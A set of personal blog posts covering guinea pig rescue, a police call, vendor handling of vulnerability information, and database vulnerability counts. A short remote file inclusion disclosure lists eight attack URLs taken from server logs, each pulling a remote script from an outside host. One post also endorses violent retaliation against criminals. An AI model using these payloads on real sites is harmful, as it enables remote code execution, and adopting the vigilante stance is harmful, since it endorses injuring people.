Reflection on Rescue

i own guinea pigs. seven of them now, mostly rescues. they come from all types of places, but mostly from places where they were in bad shape or had no future. a year ago i barely knew anything about them but Kay got me into them. before long i had one. two. three. four. five. six. seven. just that fast it seems. went from a single large cage to a six foot tall custom C&C cage that takes up a fourth of the living room. for some reason, i am perfectly ok with that. for the most part they are simple and dumb creatures that can no longer survive on their own. they have been domesticated as long as, if not longer than, cats. they now take a considerable amount of time each day, preparing vegetables twice a day, spot cleaning the cage, filling water, giving them food, providing hay and interacting with them. on most days they get out of the cage into a play pen on the floor and get to run around. being simple creatures, changing up the play pen or their cage by re-arranging stuff or introducing new items to either does wonders to stimulate them. they are touch-me-not creatures, hate to be held, and show no signs of affection toward each other, let alone me. despite that, i love them dearly and believe deep down that by rescuing and caring for them, i am righting a speck of wrong-doing on the part of humanity and our history for obstructing nature. the least i can do is to provide them the absolute best life possible. if it means my living room is always a mess or that i skip a few nice meals so i can buy them the veggies they need and want, so be it. simple creatures or not, they would not be in the general predicament had it not been for meddling humans.

it’s hard being here all day every day near them. while i love watching them and talking to them, i am present for every cough or odd noise they make. every troubled wheek, every sign of discomfort, i hear it. a few of them are older pigs and are likely not going to be here a year from now. even Waffle who was adopted early on has an ongoing problem with congestion (for lack of better words). she gets over it quick but in a guinea pig, that type of respiratory distress can be fatal. i dread the day when one of them decides to move on. until then, they deserve to be happy.

at some point recently, Kay asked me what animal ever benefited from our domesticating them. i thought long and hard and the only time i could come up with an answer was directly due to my ignorance of the animal and their history. the more i thought about it the more i realized that question was a great fundamental eye opener to anyone who was under some impression that animals were better off as pets. if given the choice, i don’t think i would change anything about the pets i have or will have. the only difference is that now, i completely and fully understand that it is entirely selfish, not because the animal benefits from it. hell, we feed our cats a diet of carbohydrate rich pellets that are about as far from their natural diet as you can possibly get. yes, the cats live a long time on that diet, but they aren’t necessarily happy or healthier as a result. the proper diet consists of food from boutique pet stores and fetch prices that most people can’t afford, so we fall back on really horrible foods that turn cats into slugs.

Stand Your Ground

The night started with a loud voice from outside, echoing between the buildings. Couldn’t see
anyone from any window but it was definitely very close. Since it couldn’t be from the balcony
or parking lot, and wasn’t the courtyard in the next building or mine, it had to be someone between the buildings but near the alley. I went out the front door and looked over the edge and saw someone. He was loud, sounded intoxicated or under the influence. He mentioned crack cocaine in his ramblings so i called
non-emergency police. Yes, someone who used to do bad things and avoid cops like the plague is the one calling them these days. That ‘neighborhood watch’ sign warns you about me in these parts. If you are
going to do bad things, don’t be so fucking obvious please.

Last time it was a drunk shouting at the top of his lungs in the parking lot. I called non-emergency and Denver District 6 rolled up in under 2 minutes, questioned him, ran his info and arrested him (warrants i assume). Tonight, DD6 rolled up in about two minutes, the officer approached the perp and told him to be
cool, saw me up above on courtyard level and asked me where the 2nd guy was. I told him if there wasn’t
a 2nd, he had been talking to himself all night.

I feel bad because for the most part, he wasn’t doing harm. He was loud, he was on private property
and he was talking about illegal activity. Any one of those things wouldn’t have been bad, but after hours of that, why should the tenants suffer? When the officer walked up, the perp was immediately worried and scared of going to jail. Even with the officer talking to me a floor above, the perp didn’t seem to realize I was there or why the officer showed up. When I realized he had been talking to himself and not someone that was out of sight, all I could think of was how the system has failed. Without getting into some huge political rant, why do we spend billions on overseas aid packages and wars when we have so many problems at home. I would have rather gone down there and given him a warm meal and an old shirt rather than call the police, but the state of society just makes that too risky. It’s really sad.

While the officer searched him and secured him, I started to back away so that the perp couldn’t see me. I realized quickly, “wtf”. I live here, this is my home. Why should I be afraid of him or anyone else that doesn’t belong. I know good people get hurt by bad people for just that sort of thing, but the principle is sound. The good guys shouldn’t have to hide, they shouldn’t have to run. I stepped forward against the gate and answered the officer’s questions loudly, daring the perp to look up at me. I know the law doesn’t favor my position, but if someone commits a crime on or near my property and I report it, if they come back for any form of retaliation it should really be open season on shitheads. Not only should I be able to defend myself, but the fact that if they came back to attempt to intimidate or hurt a good citizen should give me license to put my boot on their throat or drill them with a legally owned and licensed gun.

I know, too many douche bags that don’t have the ability to rationalize and get through that process without serious bias, that turns them into would-be vigilantes that ultimately kill their neighbor on accident or find a random perp miles from home to unload on. But like the one-off dangerous misdemeanor criminal that might come back on a witness, the over-zealous vigilante is similarly the one-off. Until that changes, the good guy can only stand up for their home and their rights.

Dr. Jekyll and Mr. Hide (Sun & Disclosure)

[This was originally published on the OSVDB blog.]

Today just happened to be the right day where I saw the Jekyll and “Hide” of Sun though. A few days ago, |)ruid posted about a Solaris ypupdated vulnerability in which he says it corresponds to CVE-1999-0208 / OSVDB 11517. Given the original vulnerability was published in 1994, I had doubts it was truly the same vulnerability. I replied asking for confirmation, |)ruid replied and CC’d the Sun Security Coordination Team. Within 24 hours, Sun replied with a detailed analysis explaining how 11517 was different from the newly created OSVDB 43433, but very much related. This mail is a VDB maintainer’s wet dream; if only every vendor would provide this kind of detail when there is confusion over published vulnerability information. This is clearly the Dr. Jekyll locked up in a Sun complex somewhere who deserves kudos for the reply.

The Sun Microsystems “SunSolve” database is a quagmire of technical muck that is only rivaled by the IBM APAR database I believe. Tonight I find myself plowing through a grotesque changelog of Sun Java System Directory Server (SJSDS?). Sun apparently hasn’t fully mastered the idea of hyperlinking to make those annoying numbers on the left lead to somewhere with more information. So I log into the SunSolve database using my super secret ID associated with a sizable company that owns lots of Sun products. I type in a few numbers of interest off that list and away I … don’t go. Mr. Hide stops me quick, telling me that to read the bug IDs I have to be a better customer apparently.

You have selected content which is only available to registered SunSolve users with a valid Sun Service Plan. Please Login to access the restricted content of SunSolve and the Sun System Handbook if you are logged in to SunSolve and have received this message, please verify that you are associated with a valid support contract in the iSupport tool. If you have any questions about your support contract, please follow up with the Sun contract administrator contact at your company. If, however, none of the previous conditions apply, you may be trying to access a document that is no longer available. In this case please feel free to click on the SunSolve Feedback link at the bottom of the page and be sure to include the exact steps you took before you received this error message.

Wow, way to foil me via security through obscurity Sun Microsystems. Please take Mr. Hide and shove my beer bottle up his ass, sideways. Booze is the only way to adequately cope with the kind of headache born from vendors who can’t manage, organize, and share information.

Disclosure: Multiple Software Remote File Inclusion

[This was originally disclosed on the VIM mail list. VulnDB IDs 90794, 90795, 90796. This was the result of watching Apache logs on attrition.org and observing a wide variety of RFI attacks. I started comparing some of the scripts being attempted with OSVDB and noticed some were not found. That means these were essentially 0days being exploited in the wild.]

Quick searches didn’t find these in OSVDB. I haven’t had time to check the
other VDBs.

/contenido/external/frontend/news.php?cfg[path][includes]=http://www.jef.at/vn

/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pusanfood.com/bbs//skin/zero_vote//data/res.txt??

/claroline/tracking/userLog.php?rootSys=http://www.free-ddl.com/siteadmin/test.txt%3f%3f%3f

/admin/cron_pop.php?adm_path=http://www.smagz.com/bo.do%3f%3f

/class/class.dashboard_lms.php?where_framework=http://www.randdesign.de/ppoint/include/main.txt??

/modules/TotalCalendar/validcode.php?inc_dir=http://www.geocities.com/injitinjitsemut/cmd1.txt??

/classified_right.php?language_dir=http://www.gracesalesco.com/gracesalescocalendar//tools/test.txt??

/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.unescoulsan.org/bbs//data/safe1.txt???

Vulnerability Counts and OSVDB Advocacy

[This was originally published on the OSVDB blog.]

CVE just announced reaching 30,000 identifiers which is a pretty scary thing. CVE staff have a good eye for catching vulnerabilities from sources away from the mainstream (e.g. bugtraq) and they have the advantage of being a very widely accepted standard for tracking vulnerabilities. As companies and researchers request CVE numbers for disclosures, they get a lot of the information handed to them on a silver platter. Of course, sometimes that platter is full of mud and confusion as vendors don’t always provide clear details to help CVE accurately track and distinguish between multiple vulnerabilities. I’ve also pointed out many times in the past that CVE is a very unique VDB that provides identifiers for vulnerability tracking. They do not provide many fields associated with other VDBs (solution, creditee, etc). As such, they may have a single entry that covers multiple distinct vulnerabilities if they are the same class (XSS, SQLi, RFI), or if there is a lack of details but they know it affects the same product (Oracle). So when we see 30,000 identifiers, we have to realize that the real count of vulnerabilities is significantly higher.

CVE is run by The MITRE Corporation, sponsored / funded by the NCSD (US-CERT) of DHS under government contract. That means our tax dollars fund this database so it should be of particular interest to U.S. taxpayers in the security industry. I know from past discussions with CVE staff and other industry veterans that on any given day, they are more likely to have more work than available staff. That means the rate of vulnerabilities that get published is greater than the resources CVE can maintain to track them. In short, the 30,000 identifiers you see only represents a percentage of the vulnerabilities actually disclosed. We could probably debate what percentage that represents all day long, and I don’t think that is really the point here other than “we know it isn’t all of them”.

Every VDB suffers from the same thing. “Commercial” VDBs like X-Force, BID and Secunia have a full time staff that maintain their databases, like CVE does. Despite having all of these teams (some of them consisting of 10 or more people) maintain VDBs, we still see countless vulnerabilities that are ‘missed’ by all of them. This is not a slight against them in any way; it is a simple manner of resources available and the amount of information out there. Even with a large team sorting disclosed vulnerabilities, some teams spend time validating the findings before adding them to the database (Secunia), which is an incredible benefit for their customers. There is also a long standing parasitic nature to VDBs, with each of them watching the others as best they can, to help ensure they are tracking all the vulnerabilities they can. For example, OSVDB keeps a close eye on Secunia and CVE specifically, and as time permits we look to X-Force, BID, SecurityTracker and others. Each VDB tends to have some researchers that exclusively disclose vulnerabilities directly to the VDB of their choice. So each one I mention above will get word of vulnerabilities that the rest really have no way of knowing about short of watching each other like this. This VDB inbreeding (I will explain the choice of word some other time) is an accepted practice and I have touched on this in the past (CanSecWest 2005).

Due to the inbreeding and OSVDB’s ability to watch other resources, it occasionally frees up our moderators to go looking for more vulnerability information that wasn’t published in the mainstream. This usually involves grueling crawls through vendor knowledge-bases, mind-numbing changelogs, searching CVS type repositories and more. That leads to the point of this lengthy post. In doing this research, we begin to see how many more vulnerabilities are out there in the software we use, that escapes the VDBs most of the time. Only now, after four years and getting an incredible developer to make many aspects of the OSVDB wish-list a reality, do we finally begin to see all of this. As I have whined about for those four years, VDBs need to evolve and move beyond this purely “mainstream reactionary” model. Meaning, we have to stop watching the half dozen usual spots for new vulnerability information, creating our entries, rinsing and repeating. There is a lot more information out there just waiting to be read and added.

In the past few weeks, largely due to the ability to free up time due to the VDB inbreeding mentioned above, we’ve been able to dig into a few products more thoroughly. These examples are not meant to pick on any product / VDB or imply anything other than what is said above. In fact, this type of research is only possible because the other VDBs are doing a good job tracking the mainstream sources, and because some vendors publish full changelogs and don’t try to hide security related fixes. Kudos to all of them.

Example: Search your favorite VDB for ”inspircd”, a popular multi-platform IRC daemon. Compare the results of BID, Secunia, ISS X-Force, SecurityTracker, and OSVDB:

Compare these results to OSVDB after digging into their changelogs.

Do these same searches for “xfce” (10 OSVDB, 5 max elsewhere), “safesquid” (6 OSVDB, 1 max elsewhere), “beehive forum” (27 OSVDB, 8 max elsewhere) and “jetty” (25 OSVDB, 12 max elsewhere). Let me emphasize, I did not specifically hand pick these examples to put down any VDB, these are some of the products we’ve investigated in the last few weeks.

The real point here is that no matter what vulnerability disclosure statistic you read, regardless of which VDB it uses (including OSVDB), consider that the real number of vulnerabilities disclosed is likely much higher than any of us know or have documented. As always, if you see vulnerabilities in a vendor KB or changelog, and can’t find it in your favorite VDB, let them know. We all maintain e-mail addresses for submissions and we all strive to be as complete as possible.